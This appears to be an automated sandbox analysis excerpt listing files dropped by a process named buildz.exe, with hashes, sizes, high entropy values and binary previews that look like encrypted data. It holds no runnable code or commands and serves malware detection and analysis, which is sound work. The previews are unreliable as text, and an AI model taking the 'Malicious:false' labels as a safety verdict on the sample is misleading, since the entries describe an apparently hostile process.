                        Preview:<?xmlJ...........aKV[e.E..^.....P......\Q<.a.z~X..E..O......@I...$.B....$..eD...:..c+=....m$......QFY...;.d..6..K...&..X..~]..W....oe..U8.....l....D..}q_).L.....@.\w/9G....aR0...R.z..h^.k.F..".DO._}....S .&.*.)o.G.....>^..\+e.....n.~.].m{.../|...Q..0...s..S)....o.._.#v.....\........\.....j....,.....B'....\U...Td%&.i..c..~.3...;.wl...9.....nb...6........S..(~r.v....^5.5..^S&0!..c.2.^4.(.m..W.4.J...) .0..?V3E....F.W+........}_..i...v+.Z;.{.....[7.C.5...=.^...Gz2..9.6,"w..L..W...x.....T}4.|.Q.......].:.g...V.7.b.I;....W..P`1.o..{_.U...-.s,f.{.a......%...}@..m....-..r...i..e../.2.h ..f|.....i...g......&................0F..h.9..E...y..A#...c._..........`...[.........j$sY#..0j.#M./Je#..H$.7}W........D.8)T.#.?.A....Y9b.)Y.|.......X.W..p....1M^+>.YHIfxC.2..............(:..3...2..o9A..+.R........;...2ET.j.#.I.d*N...l(...A[.@...D..x!WW`.4[>...R.[GV...F6.5H..$j*k..<..`....K..*...f..+../.........W'.t..E..].Z.$.f.G...~n..........`..x.G.\.UG..eJ....)]
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1737
                        Entropy (8bit):7.891138323488561
                        Encrypted:false
                        SSDEEP:48:5IuJwSYsy54ufxsLPA5eeQEVQSkek0yZ0UD:Jw55lOPSs2QQkh0A
                        MD5:B7635C9756A329421D408A0E36B4F213
                        SHA1:7BB38D4C13F4D4700356A5F7ADD4E588DE8317A5
                        SHA-256:CEA0B963BA93C0018A32FCC048BCA9B8B66B66F54D76E43D06DC4A872DEF4E67
                        SHA-512:084D966EC354F8A69A20076E4F08ABECFFBF7775DE2E2BBA938496AC80714796ABC75EC8A61BA8368B87DD0999F57B2FA69F8F4D95176C556488A98162CB3182
                        Malicious:false
                        Preview:<?xml.I...fm..........A.qNwow..J.....8......,..`.:......F..Of.....{....O...X.Qo..S...6.Q...7...d+.....c.,....?/.s_|._......./.R..a.M%*..1u.!....M.i.....Oi...G......w#.y.....v.ZD...Y.UgA.m.4.....Y..&.....@...z..>...oH.WY|...\U%.g2...o.z....C.8.Q...M.....W0^....a.oyg..........=L...>....c.._5...z$1...G3.*..`.dz.T.....-.... ...Bh...X....i...t.....)m.....54..2#....2V.......f..x....cB............l[....x...Z.*.{.P.nO.C..].|.E\l....R....Z.F...c.7.n...w`#.^...-.....+..C'.w.b.........:.G..M...6J........4.%.U*~.[.9m.bW .Y".?.Dv.+-%.~5....5....w..b7.`cz...pU.R.R.,CC\..@JDy^.....l..e.s......8...ny...kCe{.j...DV....V.%....O..%`...G|=SElM|..s.;..._.;/..j.p.i.O........O..........|.V....8.%..c.5........u......Xw.qz...m..J...dd.<s...C..f...&.:E...L<?Y...K-5....[..Y...T,L...G..[o...I./..Y&.c.+T.2c.t5....6.J....77..=.t#.uf..V...w..T.8..._.0.X....Bv........`.E.%..<.G.:.U%.y.$...L...!.IXb.a..f..C..U..C..T~.e.....F."....Z#.k}.bl....HWsF*.z.n.....&..}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1699
                        Entropy (8bit):7.8759109040437325
                        Encrypted:false
                        SSDEEP:48:7YSo9jgZN15YLnZPl9evAYftD+VfpucNQCYkLPOW/YOUD:7ojgZSZ99ErxKIcQ2LGWwOA
                        MD5:8C901F19EDEE66FDFB379608080BD35F
                        SHA1:51E984A3678C3A8A763609295C6F405398712D6F
                        SHA-256:FA95662163EBA4A4887B66FD33F1AD933BF090882363CB2A4E3C29EB552A5ECA
                        SHA-512:34345C1E1125550D91947424F8318E4B6ABBA67F60CFF3A63C57BAC2CFD2A61EA3F8DECF10F56A6F1E3A84F0206FB1BC2A203F0F4354487D5AEB61EDE46B18DF
                        Malicious:false
                        Preview:<?xml.s.HO..-V*.W.?.E.0..A4q.Tl4.].t~<........t....g.....e-..hF.(Bm..?.....T..^.......c.Fj}..%IuxP.].sv~..Y....n&..Z.3... zcl..15];U. .;{.T.._..qk..Q.y.1......x........."f....2F.pnD7>..d.Y.]UG .=...h......._.a..p..t..Z....8s...1.)....H..B..KKD *B.C(vM.Q....p....)..:.......Z.i.X3.O.~.Kn...l.....(C_...M...>.....;...8]RYd..M..@.S..........f.7.H.g....1..Zb.......x/VM.R'./...q~..F.F.]..o...J..u...U>g..8..T?...}..;.77.p.0.`.2....4P..AVQD...;yG...|gWL.k.......f.=...@..Wh...e..2....b.Jn5...).....J/1Dc.J.@&.....j..6S$... Ou.].^...t.L}.E2..S._....51........U69...m..[............z.Yv-b.....9\.o.a".u.......E...l.-.....F2.+..D;.(.Ox....+..C.v.[%..%...9..'.vcW..qmd.S........'.u*..X.xcl.7.3(.u......s.n...~.......jH.m;t..7.B.@...$...k.<......n..D4..x.A...y6..i..3..:S.C..0..\........g .3...'u.D.7..98K.bY8.|5s..x...Cn...C..i.....CuV..K........J.4.2..L{Po.Q2<.|..y..6...qk...}z.|.dkWB....^4...d.....r....y{.....=sd.c...G.;.9|6.......X+.n.a<.ve..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1736
                        Entropy (8bit):7.85976658862943
                        Encrypted:false
                        SSDEEP:48:mvHQGEV9GiCBvdPuRjaPUatU2DH++mpNjw0JhLBB+VUD:WwGriowaPUYq//rHwA
                        MD5:02FF1ABC72A041F34CDEE41BFDAAA60F
                        SHA1:55B517C4D7F8B295399F03B8E6C4CE7F147AA40B
                        SHA-256:3BA3BCC7BF7D4AD602659F77F09589C3B553F4BC01AF16BB13CA6DD2E1DE73B2
                        SHA-512:95FF5D9A0DB0C135EC237286778D52E7ABF0D99EC0AE886013FDCDB2AEC9F8EAB0B1E935E4EBEC2B9A2E6676A357AF77862E83D80A2DD041D7A5AB6F92F61755
                        Malicious:false
                        Preview:<?xml....AL..........k........U.<.>v.k..a...Y+............o<.(.....W.[..9..........~..7...U]..}o....|..0.... ..2Y..~.,.....:.u.Q.f....o..$..-T...h.j.U..p~...k/T.2bGP.I...*.H[.Ul..J0...]K#..P.E...|......}bkw-...{....6...%..+.Q..=..5|sm....z..gN|;ZUa...y.U.....&GdS......I.>..@k...@.........j.....h1.)d.."...cOW..1..l..f..dV....+.K.f6.b......>...:........}..no.....pW...y.N.y!H.>...jW.\..c.&~.|_._..n..s6R..W......:.Jc...jnx.......(0:.';S..@\.8V....|TN.>C .B.O.....l...=../m".............+.Y.p....Y..".....7../."W...w.=+.z.b.E..W.f...kAQ.G.{P...&.:...Z.......%...4.<....8...Tz..D..\-.....N..{.......Z......X.]..#i....=1.N.E....k...... fDpE.+$fC.+.dz1...2O2...v...Ir9..v`.8I7U.U..o..3...> X`m+.~T.(.c.+..?d!....-G...U.....Q.....~D.....J. ..y.c.n..f)..c.cFD[\.jYA.p..N.U:...z......s$.....>.4.]...n.|`.4..i.0'.q.#...\.k..x....l..khn-.~..K.q....l+.(.x....6Li"-.0b....{.z...-t....?.0.{|...."..C....fC.V..iL....jUgv.$O.Cu.. ....0.h$.}..E.f...F....t....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1687
                        Entropy (8bit):7.896955847930968
                        Encrypted:false
                        SSDEEP:48:eAZYS9tUeLV3hUagc2vHsUZ9ieKsBg/1ZqHqUD:eAZt9tl3h/gPvHPZ8eBgDqHqA
                        MD5:6977FB5C523B90405643C22323D9BB85
                        SHA1:AE0722809913EBBC10256A1E8D4C8875882BE27D
                        SHA-256:470A9F7DC65D8161E126870AD85B2A8AF0548E94600A894E079470B3741DE48E
                        SHA-512:99A12E448679EF4C862FAA937A11E7B062C90BC6263220FA8F597696D9D020872D05D5397743BC44A1CFE73446430DDD8F0F3B17598B787219324033B3798366
                        Malicious:false
                        Preview:<?xmlt......u1...|D?..K...5..*#..L.C.n~v._.{....t.......8........~o...D..~+:.G}..'!......v..<\JZ..4.i...NU.....T.{..O...b.^.3...R...r.I.."k.~..q........:.^.j.,.Uwk.)5!.f.$.=....$.....vh...3.1....W..t.$..r.o..Gx..5......ifFk....=r.v .....Cy...vAA.g'..:..~.sE:D.......n........#.{.......K."&"..*.hmj..........b..b.*..#ix).......:....i.N..+7.a...H`).@\qY...(t.....7y..b.`...-4.!..P_N.....=.+k......,..h(....C............t*.zl/T..&g..f.1fx4..L..bl...{+......3...5.e...r.Y;.6.7...ovi.`...5..ww%r...p.Y...d..\..\.5........eo.e..J.....# !\..U5 .....pZY.f.........0@1-/....lj.H.v[.=dm6.aw.#..bA-.{m\~.6.(2c..r..dd.DZ........M5.i=.V\|....w.z...:j...Qm...Olz.TY...]0.......b..4q...7.......R...|g..2/.B.._.u.a........~.q..u.N..B.N.E.............VH.X..e%..?G...'..M..+.fn3!..4.m..ka...I.|....5...../O'.......&.....ovx..-j...0.R...mY7O.},B.....s.....R.[J*6.......N@V.:...?...G..4"9=.Q..yqjne1..g......".Q(....~\..v..3~Q..S.......*2.m.....L........^y.R4..`q@.@t...{.+...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1724
                        Entropy (8bit):7.878596739444876
                        Encrypted:false
                        SSDEEP:48:cgpbKKkkRMBGC+X9MlAG83/N2Hh3lweR+saL9RIY3Q/a1SLGUD:TpbKKXMBGC+Nm02Hh3lpa5RjILGA
                        MD5:6778DEA236165EA7F54C8C1BC1846F43
                        SHA1:2644CD4C82B63A409075FCF58296933056CF9838
                        SHA-256:7BE6B80C31201ACB6052248CEDB50E59D7C459E85949498EF220B52DD481B169
                        SHA-512:7876128865543DDF0756F8D8747C176F566509CF4EA538FFB07754202B2A3D8A3DB75DB01E389993484EAE8CBE1AC707E8145A42CB9EF5071EDFB137A54B3461
                        Malicious:false
                        Preview:<?xml5..9...zQ.. ...Fc.v..Q.`.....9.B.j........,...(..3....$.@...!..:..............~'{R...K.o...C..\./.0.....S.9.."..iPy....~...8...B...ZB.p.....r[.Lx^.<.I......'L..R...Z..=..!&.)F..7!.iXj.....+2}.r.#.m.........I....K...$.....y...Y.i..3*.....l.O;cUwKg.$.X..!_...U0..Ha..cE..(...........e{Q..M.,M.b.....]..?./.8....K..Q...^.:..:......E\'l..H.....#%.$.w..+.FL.ex.V....ID..x...............4._..j.-,..:*`...c5.=i..i0..F.`C......;.W^..9 ...K......4#..>i2..D.<.W...n.......H....t.....(.*p..+...X...n._X~qlN3RcB..\.&..u_.K.{W.).w.Q.`................7(D...'I.;.I.v#...../..3..Lq'9.".P.q..t..=...a......cD...[..t.EI.t4...6...%a..:`z.@.H.p&....G...d7..t..?UEh(i.H.....>.h...E.z.9|E..v...u:.$<.L...e......?..j..f...9?.3..'..!.....6.?....X.Z.l..GZ..$X.b.2..~.G.C........#....I..L..s.-..SZ..S..Z"..D6....''.z..WR)...=..xx...8....4qD..'...E......I.._...e...AQ.+n.x.X'w..xlk......Pk\.........gZ..#.&...e...r..YM..&..../...|....w..!.CD...ST;..s..@.......'.n.....O6.y..d.c.%
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1701
                        Entropy (8bit):7.871996738650877
                        Encrypted:false
                        SSDEEP:48:qsfJr+gPfsbpO+6VU1U/HzNPY1+YOPd73AuXMkmJUD:Pf0cqODHhP2Q73AuXsJA
                        MD5:8E32E97BF354EBE94A08C982F7C2BA59
                        SHA1:3DB436F358BFB02355DA01B199BEA98057704534
                        SHA-256:AF61DACAFA143CF11297837F0660F5A1A1BF10FE0A951DB8D9484E65DD54E829
                        SHA-512:42922B63003E12A79C2E7D6A7D89585EE8956BA17E79BC0F46A8320079FAF985D30B784512233FDECAD1A086A061D9762C56CEAA513AC5F14C7F5A38A02F8083
                        Malicious:false
                        Preview:<?xml.8.L.E.X..R),b..n;.!..m.....D..#...I....]\RYsYt.w...BT7...e.9h.=....A....b....'.d..'...;Q..Bm..q..0q[mx.........9.f].BY...*.3...N..#.aGx.D0%...n..?.`4i.hw@..y......,.:..s>.....M.Z...4.`F.e..4..!.eM..D........Ii.86.(......Y_.....=.....k..1...p..Fg1.*g..........!e.r.6.......}3...J;].B ..I.7..>b..E1...u0..7.m...:8`...!.M..X.>%<.1f.oE...`..;.e.j.."..u...I.......lV.z.... ..V..0..c......u7..=...O....{...6...1..0MN..L.~....v...c.k...-.X....-G....\...@bl.....q..].t....).?qo.4.mnRp F.....I=.EO`.[.R...:S?..L:.8...%..%4..9.Z..'.)..&..V.].3.U9...B...K.(..\.M...<.f.............{p2Q.*.7..../.B.....I%+...,...r.7..;. 5.R.t.klz...j....}.....u....u/...Q.f..,.X......../..ci2PG.r....I..u.)^.M....#......F4o..iYL.0W.]../.'..zc..,.Fi....._)Q...]...}.<......V.x...9Wi2Z..)..&.j&.+N...FX.J.S6...-.>.J.j..8v..(0..Gl+.'.V........<.....^.tX..; ......^hs.....y.!w.PoR......3..$YUU}(3J..87A.` J>.7.~gz*........#..|.4.}..f..>t!...e.o..f....l.(.fn.8....F.....`%:...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1738
                        Entropy (8bit):7.884294012724988
                        Encrypted:false
                        SSDEEP:48:GM7RTbjL1qp3MXmZlrKMCFFj8eDY5YYZ8mUD:GM71jL1qdMXWrNCXjCYWrA
                        MD5:9027776FBD8C7238C06997810EA6C166
                        SHA1:47EBC6BE70BDC1B3E464387DF0915C9AA7E15B63
                        SHA-256:1320C8AA9CA5399144A5F4E85F4F7DE2DEAA7E82EE8559E0F953A897F20D3B51
                        SHA-512:4F6FFC88261D9B1E613A9ECDA180A245332A3F982B17F8D044BAD62EE5E6D0B877A127775BAA251B421B66C8E6130841609190943AE170ABDBF8FAC6EFCF472D
                        Malicious:false
                        Preview:<?xml.g.^.;:....=ji....>../.-\....#.Y9.{x.hP.\. ..Am.m|`...C[.....k..&..cM|3....n[..X.P...YX...\....?..d...0k...t~....~j|..j....k............T.^*.z2.e..fB=f.xo.`zf;..>5'a.......Vt..!..Im+&V.~ 'K6.rh..~X"......`.".a7.2qS1.>q....wO..C....fnE8..\9..c.)J..m.\......9U.b:-..O...b...1%W.....B.",..}..o.n...h%...1o...A.k%......9v.o3.....L..7..=.8:..../`..!..,..ER.M/.V..Y.u ..H.J(..|..0...d.0.mO1...<...|......S......R..qI..v..5..S-..,{...3\^>....)..c.....6^.....)s@...y.^..j.[..l.DjX&-.d..-.k..4...B8.....0.E.a^z...[,.\....k..v.)l"........+B.KL/.`.a..7..X.....U.i.0...Z.Lk;...1.yM.6..K........-.I^.|.q`.=..L.D.c.)`.G........=..BN{._..8y..K....YbO...G.........@...b*......t.1~K............(._.y...qU.A'....wD.w...SEg]...C.c.e..O...OK0.)..21T.#c@....e...Ri...=..c.m!?....gr8..."|......+'.A.2.I.@>s8. .z:.{=.x...I.3....y...5.?U~.-C@w..P.Y.d..1....-K..H.@....!...\.o%m.I...r..Z....: ..*.8.....\..C.i)...y...^o...T.wS}5....M..G.q.x.w/S.1..N.6..>...N($l...X.z..t.X..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1707
                        Entropy (8bit):7.8851278712082
                        Encrypted:false
                        SSDEEP:48:cxGeTeyjUURupctbWQfywjWpZJ73UP0vBz5tzeESH2PVUD:SVCyjXAStjfNmrkPwz5GHWVA
                        MD5:C6C48E2E68EFA0CF2A46DCE621F25B24
                        SHA1:3FBF229FC0B64190CAC1DB19151D41473F7A4C30
                        SHA-256:A8DDADD5872245A141842698427DC95DD7CCE073F764BB9F9440F69760282768
                        SHA-512:A2E398C4F8FD1365341E45BC508CBAAE2B487CD4192D1740C16656E073503F169F7E3117800816ED3EB64F99A18008E63B522A9C0D2748D130DD507F60BCE23F
                        Malicious:false
                        Preview:<?xml.L.....'..ra...g...'\u..R.Ag.#.@U{q>...z.G....H...p..a..+..5..Df._.K...1.K.......|4..{....e...L..O1r.}s..n..G<...&.....cH....NG..r.u..&.........+H.......:.Z0.K-..).?e.Xv...>q..0.p..R..i..3...E#X<....d.Q.i..S.v....k"1.+.e.r....yIf...B.B.:q=V.t{OET.)C.k.O.2.oB.....wN....,p..L.e<`Dc'f.F]a.....D...RO.s=(P..@)......gevdg..(\....$.P..t< .;L.G....'..@.........s.2...N'U.n...?!&'....>..m..N$-g........s../...<..?2.m.}.]..LPV....H._..^.".T....o..<...q9.)S..?..\o.......j.....".(.....F....qu.n...c.....8...:. .<t.....E...y`.mb....3..Y..".y..Y'...p..UF....z.[M.xS...<.`.d.&......D..6.,.....y..5........@..#..PdjG....W.>.....F.oT.}.E..&.S...h...c.8q...}t.k.....64.n.N...l.....u.....9j...+....:.^....C....brZ.....[r....y....o...G.|..N...R<.....................:......c2.s........V......T.3..6.'......7...oV.br.2.J..r.V0.}l..&.......q....T.u.7H":.w$o>."&.!..9..0..-.t`..K..W.......eTIp.8....K...y..~Z1g..iB....-O.r2(...2......S.y..|....a|i....!._o
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1744
                        Entropy (8bit):7.884355835932457
                        Encrypted:false
                        SSDEEP:48:IUPVPNGW3kY57JGf7nFhl3EZLotcIlDHRS7UyBtUD:b0Y+f7nFhl3WoqADHRS7vbA
                        MD5:775564F17067D51C5A52139607C5BBD5
                        SHA1:C9CDE6322478788F09EA9D74199473AC9B3AEAEA
                        SHA-256:AA6FA81F924A47D0534157BC733220FE5291F5079C7BCCE123AC0450EE821B7C
                        SHA-512:18309B93C687CBA347383D38904F39AC8AEE0C87E3AB73C48BC170EA955C82CADDA527FAD64B4827AD93D7F57D839BFED0BCA0DAAAF2E62C8077633907D08D2F
                        Malicious:false
                        Preview:<?xml`...8>.I,..1.R...y.......s...d.V...{....j....g.}....."?W...[.....cp..o.....G.JV..U7....S.I-].D....P........d..b........./....4....-.\j.m...O..p@...}jt6.=#0(..g.......0.:...;#..u...p...Kl....."..h...N6....J...R....P.X&..].W....&.n.1.y..'..mif...w........a.. ..f.D...M.!2..J3.E.J..-.s.(!..D...k..B1...+3...7.2.K5...>1...|u].JT.O....O....(1.V....-.q(......Q[W#.....d.R."#..b)^...f......e.AV.p..f.R.nh...|.\(.3.?.m........@..4._.....~.R.d.Q..u!..Uv.4...)..7.0...LBt...c#0.m...?..w....ns3.).....C..d.U..zI^.p.|.S.W5.o.[....U...z.q.....e..j7..)v..k.6...D..o\{}....Z......a.*......o...8.Y.y..W....?%....ju..c.<.8O....$4..,{;....2nOf.4..v....=\"Sw..u..R...iT..nW....g....YX*.j...2.@t.y..s......Q..i+P.".......Z.jj..fD..}Eb..Vx)..W.X..\..G..<.*K.. .>"J.^.......7...l...........P.Q..r..qO....c&.1|......S.T...f>.%..~PY+%JXTe.YD.*..Z....+....H.xeu!.4...c.I'..!.h>\>..#.U%s.9.&<.;.Ri...<s.6K...N...1.........G.D.f....b";.-....v...\.K6...A.:...d.q`.b.Wf".\
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1701
                        Entropy (8bit):7.886096931986889
                        Encrypted:false
                        SSDEEP:48:nsTvafkME678/3yDHgwU6qpBBdol2VaUD:nGv/67YCp36r7gA
                        MD5:5A812C6532F7D6647B8E668D67C478F7
                        SHA1:813D3F7904EF542364F5C7450E338D92852F6E22
                        SHA-256:533BC30BD42E0AF0387B7A7E42E639218167B104CBEBE8D07B20DD572E4AE383
                        SHA-512:F9E5232CFDA4F9669488A8439BB0258FC46AB60BB497855050C3CC2D789AF9C40748CFDA178B18C475118E6C6E40CB3A9FEF0BCC1738BDB483BE25EB1002180D
                        Malicious:false
                        Preview:<?xml*.P........Fc.P.x.4.fv..r.<........[..}.....O.x.}:...u4]|[i.G.....X:~.a.Y0.D.0..9u{..`6.b.......$@..kh~.A.........|..s..~...@.i."..%);....(.p.x"M?Y...AB.........pD....n..X"[b[D.....f.{LT)..6h...>....=_..9.1.;...}%.D...%..P..'/..m.G.r3...J.>..?.b..Y9.I.B.Z...;6d...)...dL.,.e0Q...I.,Z,2p..v.N..!..I^s..rhz.6m..^&pAB.L...v...'R.'...62.=5:(.X.+@m.`'|;P..,DN#;..w.0..(r.6k.9...i.u.G.V....B..'.ra....@...~.....x;q.........E...(..C...w..(_/......Ys....o.h\...Z.X...0....hk....Z0.S.7j...-..R..Ic.Y....v,.-"..Vs.U.Q........y.d...TK.b.5.y3.".a.k...c.ns..4....F.+M.Q.FD.Qb.R!.U....87T..[.V.M....h.k.?0I. e.....-.Y..."R.....h..:...L..P.....g|....!......w=.I.W.@..}.f.a..J&.jj..aw5u....h....r....B.........JR.&m...:NV.........U .Kz}@...(2..#>.8.;....M....-.;p.G..#M..RG.XpC...............ryZ....X.....i.9.T..>...ni.>z..~.S\...+..;.`...3.....n.Q.. De.9.*F$.,..d3V."f..A...........g..`..51...DS9.|.Z..x.q.....+x...i..y.cG.,!w.j<i..W.n...".U.C...R_8Kc..Q...:4.7
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1738
                        Entropy (8bit):7.902674465543554
                        Encrypted:false
                        SSDEEP:48:1ZYzYFHrpHhVPl5AUb5ffzyjTbcfzJZYxA5b/e1MLUD:1mz0H1hhfejPcvYCreoA
                        MD5:D28AA46737321013C29A9921A981F8B1
                        SHA1:A829442133A8606BA14A3AD7DFED1E1470DBFFBC
                        SHA-256:5B9B5D55B85C51B1DBC8703D7EFDE97586DD34032A0EEE4E5093C65F8ED70340
                        SHA-512:2FCCDFA490548625E7A78BE57E6D2F1CEDC5F8087563F2CEA9BD111843EDA1D3838576694F0FD51D6C7EECE5858E10FEE502C9F5CBDE5A6C8AF7788CC74BDBA2
                        Malicious:false
                        Preview:<?xmlKn...*.e..*.g...?..Pg......P.B.{.9}@.vG#.;-.2P.&.o.9..l'Jcz.IQ&.|....V.S..........^..{m....K.......k,....>.\...|dO'..Hk..v..H.w ....(B....RpB..>.N.t.."0.-..7..)h.\>w..g~.43..=`.W....[.aQ(..i.rfl<.........R..F.i...o....$...*.y.6@.43............._g....4....c.V...\...m.......T.A.E..7....f.....=#.:.,O.V.Z...Y).(v.8.....v..l..V?t.-.Z\?/@..x.r........x.#8i1.n..O.H#.{..;..9...m...... w......|......^..uc..Sp6.=..\".-.... b.=...gr0./q.b..Z..~_......`Gg!.......}..........t..e..^S<O......../...ro......w.x...j..Q..jbHk...e..M\.Ii`..."a.......)..6......pY.v1.r.^4.....(..;.........!.8..(A....]..Y.2.knN....]..z..Y..*...l.N...).....ic3..q....[.^.A7...W.s.}........JOI...P........U.J.g..x+H..."."(C..a......(Lun)i...p...X...JtP...x`..R...mQ^..UC.Ry..7.N.....e..|G.....S...!.'.dN.^vVFa`.2.:z.5..0..N..p......g.MeI*...[.=.R.a...^...O...+X^y....^.9.8..n.Z.[*i...6.._o..~.G..>....c.....UF..L.]..U._.;.?.....~.@....(=.E.*..&GU......U]..S....h}.X.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1702
                        Entropy (8bit):7.885362892586587
                        Encrypted:false
                        SSDEEP:48:ZATbiDigbcybgzljDYnNMAOMN24dCxd3UD:qfiDlbgBjDY9OMN2n3A
                        MD5:C4B1EA48DA6DFB8A9DE88F01504E2CF2
                        SHA1:E03AA994D9D84F2533FFFD4CC4EC048F1C852A01
                        SHA-256:CC09B1A6511F36ADDEC4468144830EE4E84C412ACBCD2631D06C93F618459D8C
                        SHA-512:AC7FC0496C291AA3925D9727B0664BC615F3A2ED5B654E2B9076F8403978ADB65925AE8A3A84112254F16E9C896BCFF1307467124F13430E0998AA0630FEB74A
                        Malicious:false
                        Preview:<?xml.l.c]....).._~-#.~...s......VF.......>..K`...mEPj...."...s.}.(.%.!..#zs.gK.2.\.....`#<..sW.t..X\...g..)|.....E....g..>....s.Qf....b_^:w)#...G..I..Q_......u;.pH.+W.m....x..\.i.Jj=..v/#.'..y.>O+......S.o.Y...bM.T@b.I..f.O.^...P1..~nk.Q...F.D.[.'@...a..Lj...r.......9ki..\%....Lt.."C.u.kQ._.k.k.... ..m....1.....h..lq.^j,.1l.&.....%..E.6.....o98.S..,....Iu.`S;.m.o...BJ..?..Z.......X...H.}g:..:.Z....;...>K.......;..8..... ...=b4t..4;.).....K.@V.u.....u.....D.C..M%.?...8#....5..V..,.3btA.R.$....8].e...9.......c.SK.v7..x*.c...Z..@.~4$1C..>;r..........*i?...9h..R.f..e[?cH........b...G...y...X...v..3.0..LG..x.P.T.O.......P....+.;.dux5.HQ.n....,.3....$....j"T...F....N..w...c.....b.D...Kh8...."&8A.W..2`.5pLIiBLS.T....2Hb.v.\.&.. ...y...........*~p..<..$...N)2.n1....iX..v....<@.M|...<.8.%a.o..1....V..Lj..yk.^.....u+....s..:...0.f...o...?.{Ao..24.|....\.......W.&..M\8.a........lm..0i..e.I"T...9...v..i..!I.P.../..#4X.D_V|.U.m.t.(5..Uy:.8....1.Wl.'7WS
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1739
                        Entropy (8bit):7.879517897435726
                        Encrypted:false
                        SSDEEP:48:klLKVyxfdLhGSDPFOym3HNcMubGkkrd2XY+oednTUD:kl+cxDPFY35ubPmcY+osnTA
                        MD5:FE281BAD44FD20A8F7146F5A877DA2E0
                        SHA1:A50D8ED4C374859C8B808FDD92D045F85826501A
                        SHA-256:2BFFA5E5DD37B4EC40CC7DB6ACF6B9014455FE32F8FC0C0266880C1CEAFABE63
                        SHA-512:A534F3004296E0070A63CA5BCCCC278C004456E80A5694005E04DA12A72BCA6843B03605071969C17ED4A36596C97467F05FE16F48F3F758D79CBF6D8977052D
                        Malicious:false
                        Preview:<?xml....;.O=.3DD....}5..`.m....<........V....s. ...........V.^......o....*...f(.?.....m...,Z.....u-.I0.......b...279..B.b....jQ'.....`XQm.KE....2>H....waLJ.Ei^n1...,...-.......{Kk..)S...o...Mf.S.:0...."....E.U)g..IQ9.......sk=c.T..k....,.\.gH...J..Mi..\V...H.gf.6.<..&..Vp../.d..u.....x.X.A..!.s.T.P....cV.G..SR3.[....a.p..E.+aF........!... r.fl.....'8i.H......`C.1tM...x..y{*;......@..iEoH..3."..2iki>J[mD.Y.E..b......s.........4..I.c..\v..................}.. ....;}....B=XBV[.D...<.B......K.}Q.z..%. ..}.X.1.7.PF....TU.R..i.i)3.....DH3....l.c....&.x...`..`....N.E..)...:zF..=.Wr...9.Q@Tx....Gt.?.8}hH.^.,U.{5H..........rP%.b.8...R.=..g_r...+....b.....".[...VC..-lIcW....z.!...(}.I...O,."|..:wE..!.E...N....Smn<^ZU.N.......[$.......H.1.m.O./..n.....@..v..Wn.0.....K@.Gv.|......m.....X.....=.8ScH.(,..Nf.(...h......ml._.>}P......PM...)KT...u......U...._..N....XZ......a..?g..IOI.O3....y.....y+ ...M.!....(vW.......t~i....z..9......|...RF.V.^x...N...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1724
                        Entropy (8bit):7.886694421683842
                        Encrypted:false
                        SSDEEP:24:QcSAHNxmeYhMkZD26wBt0e1M5AvRQygrcEDUQbjVBsLUhBBV5WdLkw43kSaGbD:QcZHueYhfnwzfv2y2cwBpBBV5WdYryUD
                        MD5:2EF047AF2FD27DBBF1DE1F8A3C157C67
                        SHA1:D465146C9E579E4AA22F40D25F6CE76162670168
                        SHA-256:7A7B22C4E12BC5625D09B20921A287F4437F6567160D651E332637A7E2B6EB9E
                        SHA-512:BA0AF180E861EF42F6F76237832800E93EE2C15940673B065077548A52F7F272BFAA346F1B6B71AAA1C07D5397B6CC34FB28851A0E19466B0F88B8A8E58EA787
                        Malicious:false
                        Preview:<?xml.|..=.....k..4j?.W.WjAG,.M.G..)....;/,...L.fd..i...Yv.ut..x!.qc.!S.y..i..\..~p..F1s.0s8|.....1........r.l......i....Z.....t...O>....o...;..H..z...&g.H...Q..a..qx...bf..b..|Zk.....q..`..,u..S..-.=eIzD.9.Li..A.u.9lG.'.`\.._^.-Y......C..J=.9..E..T..q..^.=...k..[.....L.D}i,O....<..`..W.<....rd....W...R^...].m..+.z........M.n.....&b.#..k&i^N..nr.....E..u..6r..8..#.+,U(\..2.......Y.~<..( .0..,W._q..e.......@V..X...j....%7.,R.2l.8.H.>...s.@*.v..5%W..;D..P&..T;{.=vnP.c.....i3=Z.v.(_...R1.i...!pA...:..2Q.3..a2_..j6..\j%.g.B.).C..=.....]...l%.?^{sUu....k..?.e7G.o...z...{...3.&...M...'>..+cda...y.Z..z.C....u.p...,..h..R...:._X-...e.T.P...ogg..B..().O.C... .M...PO...I.*...q.b.`+|..g.z........$..X.Zei.....r.@....W_'N{IH.|. F.T17...?26.[..+..$#.e.N*.*3.'..?............$c......t......?h.t..".8Y\..H.Vm[..>q.a. .k:.hV....I,..J.)...fuu.<.3=[..2....=..)Hr..L...../.V.v...t...1M.n.a.*....Z.>kQ.Z.6..h.*|........FQd.F.V.y.:~.2Zg.k.a~.F..P..*[W.H1.W
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1761
                        Entropy (8bit):7.871456144073484
                        Encrypted:false
                        SSDEEP:48:PmctoG7Xr0ZvWI2p3GXey2xqHVLkLnJxUD:RtVXoZOMBVo/A
                        MD5:284BC0B02F1948C3471BBBD5150EFB39
                        SHA1:E5BDFE241772A935B1C83C52F85DF2E09965CEFB
